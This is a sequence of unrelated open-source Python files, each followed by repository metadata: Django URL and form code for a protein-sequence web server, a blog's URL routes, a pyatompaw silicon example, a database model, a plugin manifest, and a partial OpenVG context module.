success_template_name="account/forgot_psw_ok.html",
change_password_named_url='chpsw'),
name='forgotpsw'),
url(r'^chprofile/(?P<slug>.*)/$',
UpdateView.as_view(model=Account, slug_field='id', additional_exclude_formfields=['token'],
use_captcha=False, use_login_required_decorator=True,
template_name="account/account_form_as_ul.html",
success_url="/"),
name='chprofile'),
url(r'^profile/((?P<slug>\d+)/?)?$',
DetailView.as_view(model=Account, use_login_required_decorator=True,
template_name="account/profile.html",
slug_field="id",
context_object_name="account"),
name='profile'),
)
|
safanaj/django-contrib-aderit
|
project_template/account/urls.py
|
Python
|
gpl-3.0
| 3,092
|
"""
Define the base Protocol classes and meta-classes.
For documentation on broker and common message types see parlay.protocols::
"""
class InvalidProtocolDeclaration(Exception):
"""
Raised when there was a problem with your protocol declaration
"""
pass
class ProtocolMeta(type):
"""
Meta-Class that will keep track of *all* message types declared
Also builds the message field lookups from the Django-model-style message class definitions
"""
protocol_registry = {}
def __init__(cls, name, bases, dct):
# register the message type
protocol_name = name if not hasattr(cls, 'name') else cls.name
cls._protocol_type_name = protocol_name
if protocol_name in ProtocolMeta.protocol_registry:
raise InvalidProtocolDeclaration(protocol_name + " has already been declared." +
"Please choose a different protocol name")
ProtocolMeta.protocol_registry[protocol_name] = cls
super(ProtocolMeta, cls).__init__(name, bases, dct)
|
PromenadeSoftware/Parlay
|
parlay/protocols/meta_protocol.py
|
Python
|
gpl-3.0
| 1,074
|
from django.conf.urls import url, patterns, include
from django.conf import settings
from rest_framework.urlpatterns import format_suffix_patterns
from rest_framework import viewsets, routers
from blog.feeds import BlogPostFeed, BlogPostFeedByCategory
from blog import views
"""
# Routers provide an easy way of automatically determining the URL conf
router = routers.DefaultRouter()
router.register(r'categories', BlogCategoryViewSet)
from haystack.query import SearchQuerySet
from haystack.views import search_view_factory
sqs = SearchQuerySet().filter(site_id=settings.SITE_ID)
"""
# Blog Feeds
urlpatterns = patterns('',
("^feed/(?P<cat_slug>[\w\-]+)/$", BlogPostFeedByCategory()),
("^feed/$", BlogPostFeed()),
#(r'^search/', include('haystack.urls')),
#url(r'^search/', search_view_factory(searchqueryset=sqs), name="haystack_search"),
)
# Wire up our API using automatic URL routing.
# Additionally, we include login URLs for the browseable API.
urlpatterns += patterns("blog.views",
#url("^tag/(?P<tag>.*)/$", "blog_post_list", name="blog_post_list_tag"),
#("^archive/(?P<year>\d{4})/(?P<month>\d{1,2})/$", "blog_post_list",
#url("^author/(?P<username>.*)/$", "blog_post_list",
# name="blog_post_list_author"),
#url("^archive/(?P<year>.*)/$", "blog_post_list",
# name="blog_post_list_year"),
#url("^(?P<slug>[\-\d\w]*)$", "blog_post_detail", name="blog_post_detail"),
#url("^(?P<slug>[\-\d\w]*)$", "blog_post_detail", name="blog_post_preview"),
#("^archive/(?P<year>\d{4})/$", "archive_months"),
#url("^archive/(?P<year>\d{4})/(?P<month>\d{1,2})/$", "blog_post_list", name="blog_post_list_month"),
#url("^category/(?P<category>.*)/$", "blog_post_list", name="blog_post_list_category"),
#url("^post_comment/(?P<blog_id>\d+)/$", 'blog_post_comment', name="blog_post_comment"),
# With Rest Framework & Anuglar JS
url(r'^api/locations/$', views.LocationList.as_view(), name='location-list'),
url(r'^api/categories/$', views.BlogCategoryList.as_view(), name='blogcategory-list'),
url(r'^api/categories/(?P<slug>[\w\-]+)/$', views.BlogCategoryDetail.as_view(), name='blogcategory-detail'),
url(r'^api/posts/$', views.BlogPostList.as_view(), name='blogpost-list'),
url(r'^api/posts/(?P<slug>[\-\d\w]*)/$', views.BlogPostDetail.as_view(), name="blogpost-detail"),
url(r'^api/photos/$', views.PhotoList.as_view(), name='photo-list'),
# url(r'^app/partials/(?P<page>[-\w]+.html)/$', 'angular_views'),
# url(r'^app/$', 'home', name="blog_home"),
# Noral View
url(r'^blog/(?P<category>[\w\-]+)/(?P<slug>[\w\-]+)/$', views.BlogPostDetailView.as_view(), name='post-detail-old'),
url(r'^posts/(?P<slug>[\w\-]+)/$', views.BlogPostDetailView.as_view(), name='post-detail'),
url(r'^(?P<category>[\w\-]*)$', views.BlogPostListView.as_view(), name='post-list'),
#url(r'^$', views.BlogPostListView.as_view() , name="post-list"),
)
urlpatterns = format_suffix_patterns(urlpatterns)
|
argonemyth/argonemyth-blog
|
blog/urls.py
|
Python
|
gpl-3.0
| 3,001
|
# -*- coding: utf-8 -*-
"""
Created on Sun Apr 27 10:59:45 2014
@author: James Ahad
"""
from django import forms
from django.contrib.auth.models import User
from idp.models import UserProfile, Sequence, Sequence_seqdata, Sequence_jobs
class UserForm(forms.ModelForm):
username = forms.CharField(help_text="Please enter a username.")
email = forms.CharField(help_text="Please enter your email.")
password = forms.CharField(widget=forms.PasswordInput(), help_text="Please enter a password.")
class Meta:
model = User
fields = ['username', 'email', 'password']
class UserProfileForm(forms.ModelForm):
class Meta:
model = UserProfile
fields = ()
import idp.computation as comp
class SingleSequenceForm(forms.Form):
seq = forms.CharField(max_length = None, help_text = "Please enter an amino acid sequence")
tag = forms.CharField(max_length=None, help_text = "Give your sequence a label")
def __init__(self, user, *args, **kwargs):
self.user = user
super(SingleSequenceForm, self).__init__(*args, **kwargs)
def save(self):
seqstring = self.cleaned_data['seq']
computeSeq = comp.Sequence(seqstring)
from django.utils import timezone
newSequence = Sequence(seq = seqstring,
tag = self.cleaned_data['tag'],
user = self.user,
submissionDate = timezone.now(),
seqProc = False,
jobProc = False,)
newSequence.save()
newSeqData = Sequence_seqdata(seq = newSequence,
fplus = round(computeSeq.Fplus(),5),
fminus = round(computeSeq.Fminus(),5),
FCR = round(computeSeq.FCR(),5),
NCPR = round(computeSeq.NCPR(),5),
meanH = round(computeSeq.meanHydropathy(),5),
sigma = round(computeSeq.sigma(),5),
delta = round(computeSeq.delta(),5),
dmax = round(computeSeq.deltaMax(),5),
kappa = round(computeSeq.kappa(),5))
newSeqData.save()
newSequence.seqProc = True
newSequence.save()
return self.user
class MultiSequenceForm(forms.Form):
seqlist = forms.CharField(widget=forms.Textarea(attrs={'cols': 500, 'rows':10}), help_text = "Please enter amino acid sequences separated by carraige returns")
tag = forms.CharField(max_length=None, help_text = "Please enter your sequence category")
def __init__(self, user, *args, **kwargs):
self.user = user
super(MultiSequenceForm, self).__init__(*args, **kwargs)
def save(self):
seqlist = self.cleaned_data['seqlist']
for seqstring in seqlist.split('\n'):
import string
import re
inputtable = re.sub('[%s%s%s]' % (string.whitespace,string.punctuation,string.digits), '', seqstring)
if(Sequence.objects.filter(seq = inputtable, user = self.user).exists()):
continue
computeSeq = comp.Sequence(inputtable)
from django.utils import timezone
newSequence = Sequence(seq = computeSeq.seq,
tag = self.cleaned_data['tag'],
user = self.user,
submissionDate = timezone.now(),
seqProc = False,)
newSequence.save()
newSeqData = Sequence_seqdata(seq = newSequence,
N = computeSeq.len,
fplus = computeSeq.Fplus(),
fminus = computeSeq.Fminus(),
FCR = computeSeq.FCR(),
NCPR = computeSeq.NCPR(),
meanH = computeSeq.meanHydropathy(),
sigma = computeSeq.sigma(),
delta = computeSeq.delta(),
dmax = computeSeq.deltaMax(),
kappa = computeSeq.kappa())
newSeqData.save()
newSequence.seqProc = True
newSequence.save()
'''
class tagForm(forms.Form):
tag = forms.CharField(widget=forms.SelectMultiple, help_text = "What Sequences do you want to work with?")
def __init__(self, user, nextForm, *args, **kwargs):
self.user = user
self.nextForm = nextForm
super(MultiSequenceForm, self).__init__(*args, **kwargs)
def save(self):
'''
class wl_JobForm(forms.Form):
'''
FIXME:
- Needs to handle Freeze File input
- Needs to handle sequence design (aka be able to specify a range of kappa for permutant generation)
'''
seq = forms.ModelChoiceField(Sequence.objects.none(), help_text = 'Select sequence to solve for Kappa DoS')
#seq = forms.ModelMultipleChoiceField(Sequence.objects.all())
genPermutants = forms.NullBooleanField(help_text='Would you like to generate Kappa sequence permutants?')
def __init__(self,user, *args, **kwargs):
super(wl_JobForm,self).__init__(*args, **kwargs)
self.user = user
#q = Sequence.objects.all()
q = Sequence.objects.filter(user = self.user)
self.fields['seq'].queryset = q.extra(order_by = ['tag'])
def launchJob(self):
seqchoice = self.cleaned_data['seq']
newJob = Sequence_jobs(seq = seqchoice, user = self.user)
from django.conf import settings
if(self.cleaned_data['genPermutants']):
newJob.jobType = 'wlp'
newJob.jobTypeVerbose = 'Kappa Permutant Generation'
newJob.jobParameters = '' #these are initialized as empty until input files are generated
else:
newJob.jobType = 'wl'
newJob.jobTypeVerbose = 'Kappa Density of States'
newJob.jobParameters = '' #these are initialized as empty until input files are generated
newJob.status = 'submitted'
import os
from extraFuncs import create_path
newJob.outdir = os.path.normpath("%s/%d/%d/%s/" % (settings.DAEMON_OUT_PATH, newJob.user.pk, newJob.seq.pk, newJob.jobType))
newJob.progressFile = os.path.join(newJob.outdir, 'progress.txt')
if(Sequence_jobs.objects.filter(seq = newJob.seq, jobType = newJob.jobType).exists()):
newJob.status = 'ar'
return newJob
#Make input files
inputFileName = "%d_%d_%s" % (newJob.user.pk, newJob.seq.pk, newJob.jobType)
inputFilePath = os.path.normpath("%s/%d/%d/%s/" % (settings.DAEMON_IN_PATH, newJob.user.pk, newJob.seq.pk, newJob.jobType))
create_path(inputFilePath)
#Progress File
with open(os.path.join(inputFilePath, 'progress.txt'), 'w') as f:
f.write('submitted')
f.close()
#Sequence File
with open(os.path.join(inputFilePath, 'seqfile.txt'), 'w') as f:
f.write(seqchoice)
f.close()
newJob.jobParameters = '-s %s -o %s' % (os.path.join(inputFilePath, 'seqfile.txt'), inputFilePath)
'''
if(not frzfile is None):
newJob.jobParameters += ' -f %s' % (frzfile)
'''
#Input File
with open(os.path.join(inputFilePath, inputFileName), 'w') as f:
f.write('User %s\n' % newJob.user.username)
f.write('First %s\n' % newJob.user.first_name)
f.write('Last %s\n' % newJob.user.last_name)
f.write('Email %s\n' % newJob.user.email)
f.write('JobName %s\n' % os.path.splitext(os.path.basename(inputFilePath))[0])
f.write('JobType %s\n' % newJob.jobType)
f.write('JobExe %s\n' % settings.WL_PATH)
f.write('JobParameters %s\n' % newJob.jobParameters)
f.write('OutDir %s\n' % newJob.outdir)
f.close()
newJob.save()
return newJob
import computation as comp
class hetero_JobForm(forms.Form):
seq = forms.ModelChoiceField(Sequence.objects.none(), help_text = 'Select sequence')
def __init__(self,user, *args, **kwargs):
super(hetero_JobForm,self).__init__(*args, **kwargs)
self.user = user
#q = Sequence.objects.all()
q = Sequence.objects.filter(user = self.user)
self.fields['seq'].queryset = q.extra(order_by = ['tag'])
def launchJob(self):
from django.conf import settings
seqchoice = self.cleaned_data['seq']
newJob = Sequence_jobs(seq = seqchoice, user = self.user)
newJob.jobType = 'hetero'
newJob.jobTypeVerbose = 'FRC Trajectory Generation'
newJob.jobParameters = '-k %s' % (settings.HETERO_KEY)
newJob.status = 'submitted'
import os
from extraFuncs import create_path
newJob.outdir = os.path.normpath("%s/%d/%d/%s/" % (settings.DAEMON_OUT_PATH, newJob.user.pk, newJob.seq.pk, newJob.jobType))
newJob.progressFile = os.path.join(newJob.outdir, 'progress.txt')
if(Sequence_jobs.objects.filter(seq = newJob.seq, jobType = newJob.jobType).exists()):
newJob.status = 'ar'
return newJob
#Make input files
inputFileName = "%d_%d_%s" % (newJob.user.pk, newJob.seq.pk, newJob.jobType)
inputFilePath = os.path.normpath("%s/%d/%d/%s/" % (settings.DAEMON_IN_PATH, newJob.user.pk, newJob.seq.pk, newJob.jobType))
create_path(inputFilePath)
#Progress File
with open(os.path.join(inputFilePath, 'progress.txt'), 'w') as f:
f.write('submitted')
f.close()
#Sequence File
seqFilePath = os.path.join(inputFilePath, 'seq.in')
comp.Sequence(seqchoice.seq).makeCampariSeqFile(seqFilePath)
#Input File
with open(os.path.join(inputFilePath, inputFileName), 'w') as f:
f.write('User %s\n' % newJob.user.username)
f.write('First %s\n' % newJob.user.first_name)
f.write('Last %s\n' % newJob.user.last_name)
f.write('Email %s\n' % newJob.user.email)
f.write('JobName %s\n' % os.path.splitext(os.path.basename(inputFilePath))[0])
f.write('JobType %s\n' % newJob.jobType)
f.write('JobExe %s\n' % settings.CAMPARI_PATH)
f.write('JobParameters %s\n' % newJob.jobParameters)
f.write('OutDir %s\n' % newJob.outdir)
f.close()
newJob.save()
return newJob
class tagForm(forms.Form):
tag = forms.MultipleChoiceField(choices = [], help_text = 'Filter by sequence tag')
def __init__(self,user, *args, **kwargs):
super(tagForm,self).__init__(*args, **kwargs)
self.user = user
q = Sequence.objects.filter(user = self.user)
tagSet = set()
for possibleSeqs in q:
tagSet.add(possibleSeqs.tag)
choiceField = []
for e in tagSet:
choiceField.append((e,e,))
self.fields['tag'].choices = choiceField
print(choiceField)
class seqForm(forms.Form):
seqs = forms.ModelMultipleChoiceField(Sequence.objects.none())
def __init__(self,user, *args, **kwargs):
super(seqForm,self).__init__(*args, **kwargs)
self.user = user
self.help_text = ''
def fillField(self,tags):
seqSet = Sequence.objects.none()
for t in tags:
seqSet = seqSet | Sequence.objects.filter(tag = t)
self.fields['seqs'].queryset = seqSet
def getSeqTable(self):
try:
seqlist = self.cleaned_data['seqs']
except:
seqlist = Sequence.objects.none()
seqdata = Sequence_seqdata.objects.select_related().filter(seq = seqlist)
import django_tables2 as tables
class SeqDataTable(tables.Table):
pk = tables.Column(verbose_name = 'sequence id')
FCR = tables.Column()
NCPR = tables.Column()
meanH = tables.Column(verbose_name = '<H>')
dmax = tables.Column()
kappa = tables.Column()
class Meta:
attrs = {'class': 'pure-table'}
return SeqDataTable(seqdata)
def getPhasePlot(self):
try:
seqlist = self.cleaned_data['seqs']
except:
seqlist = Sequence.objects.none()
seqdata = Sequence_seqdata.objects.select_related().filter(seq = seqlist)
fplus = []
fminus = []
labels = []
for s in seqdata:
fplus.append(s.fplus)
fminus.append(s.fminus)
if(s.seq.name == ''):
labels.append('%d' % (s.pk))
else:
labels.append(s.seq.name)
from django.conf import settings
import os
from plotting import phasePlot
saveDir = os.path.join(settings.STATIC_PATH, os.path.normpath('temp_%s_%s.png' %(self.user.username,'phase')))
phasePlot(fplus,fminus,labels,saveDir)
return os.path.basename(saveDir)
class singleSeqForm(forms.Form):
seqs = forms.ModelChoiceField(Sequence.objects.none())
plotType = forms.ChoiceField(widget=forms.RadioSelect, choices=(('1','NCPR'),('2','Sigma'),('3','Hydropathy')), help_text='Select Plot Distribution')
def __init__(self,user, *args, **kwargs):
super(singleSeqForm,self).__init__(*args, **kwargs)
self.user = user
self.help_text = ''
def fillField(self,tags):
seqSet = Sequence.objects.none()
for t in tags:
seqSet = seqSet | Sequence.objects.filter(tag = t)
self.fields['seqs'].queryset = seqSet
def getSeqTable(self):
try:
seqlist = self.cleaned_data['seqs']
except:
seqlist = Sequence.objects.none()
seqdata = Sequence_seqdata.objects.select_related().filter(seq = seqlist)
import django_tables2 as tables
class SeqDataTable(tables.Table):
pk = tables.Column(verbose_name = 'sequence id')
FCR = tables.Column()
NCPR = tables.Column()
sigma = tables.Column(verbose_name = 'Sigma')
meanH = tables.Column(verbose_name = '<H>')
dmax = tables.Column()
kappa = tables.Column()
class Meta:
attrs = {'class': 'pure-table'}
return SeqDataTable(seqdata)
def getPlot(self):
try:
seqlist = self.cleaned_data['seqs']
plotType = self.cleaned_data['plotType']
except:
seqlist = Sequence.objects.none()
plotType = ('1', 'NCPR')
seqdata = Sequence_seqdata.objects.select_related().filter(seq = seqlist)
ps = None
for s in seqdata:
ps = s
if(not ps is None):
plotseq = comp.Sequence(ps.seq.seq)
else:
plotseq = None
bloblen = 5
from django.conf import settings
import os
from plotting import NCPRPlot, SigmaPlot, HydroPlot
print 'im here'
print(plotType)
print(type(plotseq))
if(plotType[0] == '1'):
saveDir = os.path.join(settings.STATIC_PATH, os.path.normpath('temp_%s_%s.png' %(self.user.username,'NCPR')))
NCPRPlot(plotseq,bloblen,saveDir)
elif(plotType[0] == '2'):
saveDir = os.path.join(settings.STATIC_PATH, os.path.normpath('temp_%s_%s.png' %(self.user.username,'sigma')))
SigmaPlot(plotseq,bloblen,saveDir)
elif(plotType[0] == '3'):
saveDir = os.path.join(settings.STATIC_PATH, os.path.normpath('temp_%s_%s.png' %(self.user.username,'hydro')))
HydroPlot(plotseq,bloblen,saveDir)
print saveDir
return os.path.basename(saveDir)
import time
class MassMultiSequenceForm(forms.Form):
seqfile = forms.FileField(help_text = "Please enter sequence file with amino acid sequences separated by carraige returns")
tag = forms.CharField(max_length=None, help_text = "Please enter your sequence category")
def __init__(self, user, *args, **kwargs):
self.user = user
super(MassMultiSequenceForm, self).__init__(*args, **kwargs)
def process(self, f):
from django.conf import settings
dummies = Sequence.objects.filter(user = self.user).filter(name = 'dummy')
if(len(dummies) == 0):
dummySeq = Sequence(seq = '', name = 'dummy', tag = '', user = self.user, submissionDate = time.strftime("%d/%m/%Y"), seqProc = False)
else:
dummySeq = dummies[0]
newJob = Sequence_jobs(seq = dummySeq, user = self.user)
newJob.jobType = 'mass_seq'
newJob.jobTypeVerbose = 'Mass Sequence Submission'
newJob.status = 'submitted'
import os
from extraFuncs import create_path
newJob.outdir = os.path.normpath("%s/%d/%s/%s/" % (settings.DAEMON_OUT_PATH, newJob.user.pk, 'nonseq', newJob.jobType))
newJob.progressFile = os.path.join(newJob.outdir, 'progress.txt')
if(Sequence_jobs.objects.filter(seq = newJob.seq, jobType = newJob.jobType).exists()):
newJob.status = 'ar'
return newJob
#Make input files
inputFileName = "%d_%s_%s" % (newJob.user.pk, 'nonseq', newJob.jobType)
inputFilePath = os.path.normpath("%s/%d/%s/%s/" % (settings.DAEMON_IN_PATH, newJob.user.pk, 'nonseq', newJob.jobType))
create_path(inputFilePath)
#Input File
with open(os.path.join(inputFilePath, inputFileName), 'w') as f:
f.write('User %s\n' % newJob.user.username)
f.write('First %s\n' % newJob.user.first_name)
f.write('Last %s\n' % newJob.user.last_name)
f.write('Email %s\n' % newJob.user.email)
f.write('JobName %s\n' % os.path.splitext(os.path.basename(inputFilePath))[0])
f.write('JobType %s\n' % newJob.jobType)
f.write('JobExe %s\n' % settings.CAMPARI_PATH)
f.write('JobParameters %s\n' % newJob.jobParameters)
f.write('OutDir %s\n' % newJob.outdir)
f.close()
#Progress File
with open(os.path.join(inputFilePath, 'progress.txt'), 'w') as f:
f.write('submitted')
f.close()
#Sequence File
seqFilePath = os.path.join(inputFilePath, 'seqfile.txt')
def handle_uploaded_file(outpath,f):
with open(outpath, 'wb+') as destination:
for chunk in f.chunks():
destination.write(chunk)
handle_uploaded_file(seqFilePath,f)
newJob.jobParameters = '-s %s' % (seqFilePath)
newJob.save()
return newJob
def save(self):
seqfile = self.cleaned_data['seqlist']
for seqstring in seqlist.split('\n'):
import string
import re
inputtable = re.sub('[%s%s%s]' % (string.whitespace,string.punctuation,string.digits), '', seqstring)
if(Sequence.objects.filter(seq = inputtable, user = self.user).exists()):
continue
computeSeq = comp.Sequence(inputtable)
from django.utils import timezone
newSequence = Sequence(seq = computeSeq.seq,
tag = self.cleaned_data['tag'],
user = self.user,
submissionDate = timezone.now(),
seqProc = False,)
newSequence.save()
newSeqData = Sequence_seqdata(seq = newSequence,
N = computeSeq.len,
fplus = computeSeq.Fplus(),
fminus = computeSeq.Fminus(),
FCR = computeSeq.FCR(),
NCPR = computeSeq.NCPR(),
meanH = computeSeq.meanHydropathy(),
sigma = computeSeq.sigma(),
delta = computeSeq.delta(),
dmax = computeSeq.deltaMax(),
kappa = computeSeq.kappa())
newSeqData.save()
newSequence.seqProc = True
newSequence.save()
|
panda4life/idpserver
|
mysite/idp/forms.py
|
Python
|
gpl-3.0
| 20,697
|
from pyatompaw import AtompawMaster
# Atom definition
atom = AtompawMaster('14-Si')
atom.Atom_name = 'Si'
atom.Z = 14
# Keywords
atom.XC_functional = 'LDA-PW'
atom.projector_keyword = 'custom'
atom.logderivrange = 'logderivrange', -6, 10, 2001
atom.ps_scheme = 'rrjk'
atom.ortho_scheme = 'gramschmidtortho'
atom.Vloc_scheme = 'trouillermartins'
atom.lloc = 2
atom.Eloc = 0.5
atom.output_format = 'abinit'
# Atom configuration
atom.nmax = [3, 3, 0, 0, 0, 0] # Maximum occupied orbitals: 3s 3p
atom.occ = [(3,1,2)] # 3p has partiall occ: 2
atom.lmax = 2
atom.rpaw = 1.6
# Projectors for valence states
atom.add_valence(n=3, l=0, rc=atom.rpaw)
atom.add_valence(n=3, l=1, rc=atom.rpaw)
# Additional projectors
atom.add_proj(l=0, Eref=12.0, rc=atom.rpaw)
atom.add_proj(l=1, Eref=12.0, rc=atom.rpaw)
atom.add_proj(l=2, Eref=5.0, rc=atom.rpaw)
# Execution
atom.make() # Write the files
atom.run() # Run atompaw
# Plot partial waves and logarithmic derivatives.
atom.plot_wfn()
atom.show_wfn()
atom.plot_logderiv(show=True)
# Export the atomic dataset
atom.export('.')
|
GkAntonius/pyatompaw
|
examples/Si.py
|
Python
|
gpl-3.0
| 1,075
|
from backend import db
class Institution(db.Model):
id = db.Column(db.Integer, primary_key=True)
name = db.Column(db.String(250))
abbreviation = db.Column(db.String(20))
cnpj = db.Column(db.String(18), unique=True)
address = db.Column(db.String(250))
current_program_section = db.Column(db.String(6))
programs = db.relationship('Program', backref='institution', lazy='dynamic')
def set_fields(self, fields):
self.name = fields['name']
self.abbreviation = fields['abbreviation']
self.cnpj = fields['cnpj']
self.address = fields['address']
self.current_program_section = fields['current_program_section']
|
sandroandrade/emile-server
|
cruds/crud_institution/models.py
|
Python
|
gpl-3.0
| 680
|
# -*- coding: utf-8 -*-
'''
Mepinta
Copyright (c) 2011-2012, Joaquin G. Duo
This file is part of Mepinta.
Mepinta is free software: you can redistribute it and/or modify
it under the terms of the GNU General Public License as published by
the Free Software Foundation, either version 3 of the License, or
(at your option) any later version.
Mepinta is distributed in the hope that it will be useful,
but WITHOUT ANY WARRANTY; without even the implied warranty of
MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
GNU General Public License for more details.
You should have received a copy of the GNU General Public License
along with Mepinta. If not, see <http://www.gnu.org/licenses/>.
'''
from mepinta.plugins_manifest import ProcessorManifestBase, DataProperty, FunctionProperty
class bitmap_checker(ProcessorManifestBase):
build = False
def define(self, inputs, internals, functions, outputs):
# inputs. = DataProperty('')
# outputs. = DataProperty('')
# functions. = FunctionProperty()
pass
# functions..dpdencies += [inputs.,]
# outputs..dpdencies += [functions.]
manifest = bitmap_checker
if __name__ == "__main__":
pass
|
joaduo/mepinta
|
plugins/c_and_cpp/k3dv1/plugins/c_and_cpp/processors/k3dv1/bitmap/generators/bitmap_checker/bitmap_checker__0001.py
|
Python
|
gpl-3.0
| 1,211
|
#!/usr/bin/env python3
'''OpenVG context access.'''
# Copyright © 2013-14 Tim Pederick.
#
# This file is part of Povg.
#
# Povg is free software: you can redistribute it and/or modify it
# under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# Povg is distributed in the hope that it will be useful, but WITHOUT
# ANY WARRANTY; without even the implied warranty of MERCHANTABILITY
# or FITNESS FOR A PARTICULAR PURPOSE. See the GNU General Public
# License for more details.
#
# You should have received a copy of the GNU General Public License
# along with Povg. If not, see <http://www.gnu.org/licenses/>.
__all__ = ['MatrixMode', 'FillRule', 'ImageQuality', 'RenderingQuality',
'BlendMode', 'ImageMode', 'CapStyle', 'JoinStyle', 'PixelLayout',
'Context']
# Standard library imports.
from collections import namedtuple
from ctypes import c_float, c_int
# Local library imports.
from .. import flatten, unflatten
from ..native import (vgFlush, vgFinish, vgSeti, vgSetf, vgSetiv, vgSetfv,
vgGetVectorSize, vgGeti, vgGetf, vgGetiv, vgGetfv,
c_int_p, c_float_p)
# Context parameter types.
_params = {
# Mode settings
'MATRIX_MODE': 0x1100,
'FILL_RULE': 0x1101,
'IMAGE_QUALITY': 0x1102,
'RENDERING_QUALITY': 0x1103,
'BLEND_MODE': 0x1104,
'IMAGE_MODE': 0x1105,
# Alpha masking and scissoring
'MASKING': 0x1130,
'SCISSORING': 0x1131,
'SCISSOR_RECTS': 0x1106,
# Colour transformation
'COLOR_TRANSFORM': 0x1170,
'COLOR_TRANSFORM_VALUES': 0x1171,
# Stroke parameters
'STROKE_LINE_WIDTH': 0x1110,
'STROKE_CAP_STYLE': 0x1111,
'STROKE_JOIN_STYLE': 0x1112,
'STROKE_MITER_LIMIT': 0x1113,
# Stroke dash parameters
'STROKE_DASH_PATTERN': 0x1114,
'STROKE_DASH_PHASE': 0x1115,
'STROKE_DASH_PHASE_RESET': 0x1116,
# Fill and clear colours
'TILE_FILL_COLOR': 0x1120,
'CLEAR_COLOR': 0x1121,
# Glyph origin
'GLYPH_ORIGIN': 0x1122,
# Pixel layout information
'PIXEL_LAYOUT': 0x1140,
'SCREEN_LAYOUT': 0x1141,
# Filter settings
'FILTER_FORMAT_LINEAR': 0x1150,
'FILTER_FORMAT_PREMULTIPLIED': 0x1151,
'FILTER_CHANNEL_MASK': 0x1152,
# Read-only implementation limits
'MAX_SCISSOR_RECTS': 0x1160,
'MAX_DASH_COUNT': 0x1161,
'MAX_KERNEL_SIZE': 0x1162,
'MAX_SEPARABLE_KERNEL_SIZE': 0x1163,
'MAX_COLOR_RAMP_STOPS': 0x1164,
'MAX_IMAGE_WIDTH': 0x1165,
'MAX_IMAGE_HEIGHT': 0x1166,
'MAX_IMAGE_PIXELS': 0x1167,
'MAX_IMAGE_BYTES': 0x1168,
'MAX_FLOAT': 0x1169,
'MAX_GAUSSIAN_STD_DEVIATION': 0x116A}
# Context parameter values.
MatrixMode = namedtuple('MatrixMode_tuple',
('PATH_USER_TO_SURFACE', 'IMAGE_USER_TO_SURFACE',
'FILL_PAINT_TO_USER', 'STROKE_PAINT_TO_USER',
'GLYPH_USER_TO_SURFACE')
)(0x1400, 0x1401, 0x1402, 0x1403,
0x1404)
FillRule = namedtuple('FillRule_tuple',
('EVEN_ODD', 'NON_ZERO')
)(0x1900, 0x1901)
ImageQuality = namedtuple('ImageQuality_tuple',
('NON_ANTIALIASED', 'FASTER', 'BETTER')
)(1, 2, 4) # TODO: Bitmask values!
RenderingQuality = namedtuple('RenderQuality_tuple',
('NON_ANTIALIASED', 'FASTER', 'BETTER')
)(0x1200, 0x1201, 0x1202)
BlendMode = namedtuple('BlendMode_tuple',
('SRC', 'SRC_OVER', 'DST_OVER', 'SRC_IN', 'DST_IN',
'MULTIPLY', 'SCREEN', 'DARKEN', 'LIGHTEN', 'ADDITIVE')
)(0x2000, 0x2001, 0x2002, 0x2003, 0x2004,
0x2005, 0x2006, 0x2007, 0x2008, 0x2009)
ImageMode = namedtuple('ImageMode_tuple',
('NORMAL', 'MULTIPLY', 'STENCIL')
)(0x1F00, 0x1F01, 0x1F02)
CapStyle = namedtuple('CapStyle_tuple',
('BUTT', 'ROUND', 'SQUARE')
)(0x1700, 0x1701, 0x1702)
JoinStyle = namedtuple('JoinStyle_tuple',
('MITER', 'ROUND', 'BEVEL')
)(0x1800, 0x1801, 0x1802)
PixelLayout = namedtuple('PixelLayout_tuple',
('UNKNOWN', 'RGB_VERTICAL', 'BGR_VERTICAL',
'RGB_HORIZONTAL', 'BGR_HORIZONTAL')
)(0x1300, 0x1301, 0x1302, 0x1303, 0x1304)
# Context parameter getter/setter factories.
def _get_vector(param_id, type_=int, flattened=False, known_size=None):
'''Dynamically create a getter function for a vector parameter.
The functions thus created have all implementation details built in
when created (somewhat like currying a function), and accept one
argument, called self. They are thus suitable for use as getter
methods for properties.
Keyword arguments:
param_id -- The integer value that is passed to the native
function to identify the parameter in question.
type_ -- The data type stored in this vector. OpenVG only
directly allows integer or floating-point parameters. (It
also has boolean parameters, represented by integers, but no
parameter is currently defined as a vector of booleans.) If
this argument is set to something other than float, OpenVG
will provide an integer which will then be converted to the
supplied type. If omitted, the default is int.
flattened -- Whether or not the values are actually sequences of
vectors that need to be "unflattened" after reading. The
default is False; if True, known_size needs to be set.
known_size -- The fixed size of this vector, if it has one. If
omitted or None, the vector will be dynamically sized each
time it is read. If flattened is True, the size applies to
each vector in the sequence, not the sequence itself.
'''
# Get the native function and pointer type needed.
getv_fn, c_itemtype = ((vgGetfv, c_float) if type_ is float else
(vgGetiv, c_int))
# Construct the getter function, with the above details baked in.
if flattened:
if known_size is None:
raise TypeError('known_size must be supplied if flattened is True')
def getter(self):
size = vgGetVectorSize(param_id)
array = (c_itemtype * size)()
getv_fn(param_id, size, array)
return unflatten((type_(elem) for elem in array), known_size)
else:
# Create a function that either returns the static size (if we know
# what that is) or fetches the current size when called.
sizer = ((lambda: known_size) if known_size is not None else
(lambda: vgGetVectorSize(param_id)))
def getter(self):
size = sizer()
array = (c_itemtype * size)()
getv_fn(param_id, size, array)
return tuple(type_(elem) for elem in array)
return getter
def _set_vector(param_id, type_=int, flattened=False, known_size=None):
'''Dynamically create a setter function for a vector parameter.
The functions thus created have all implementation details built in
when created (somewhat like currying a function), and accept two
argument, called self and val. They are thus suitable for use as
setter methods for properties.
Keyword arguments:
param_id -- The integer value that is passed to the native
function to identify the parameter in question.
type_ -- The data type stored in this vector. OpenVG only
directly allows integer or floating-point parameters. (It
also has boolean parameters, represented by integers, but no
parameter is currently defined as a vector of booleans.) If
this argument is set to something other than float, ctypes
will convert the values to integers and call the native
functions that handle integers.
flattened -- Whether or not the values are actually sequences of
vectors that need to be flattened before writing. The
default is False.
known_size -- The fixed size of this vector, if it has one. This
parameter is ignored (and the actual len() of the value
supplied is used) unless flattened is True, in which case
the value applies to each vector in the sequence.
'''
# Get the native function and pointer type needed.
setv_fn, c_itemtype = ((vgSetfv, c_float) if type_ is float else
(vgSetiv, c_int))
# Construct the setter function, with the above details baked in.
if flattened:
def setter(self, val):
flat = flatten(val, known_size)
size = len(flat)
array = (c_itemtype * size)(*flat)
setv_fn(param_id, size, array)
else:
def setter(self, val):
size = len(val)
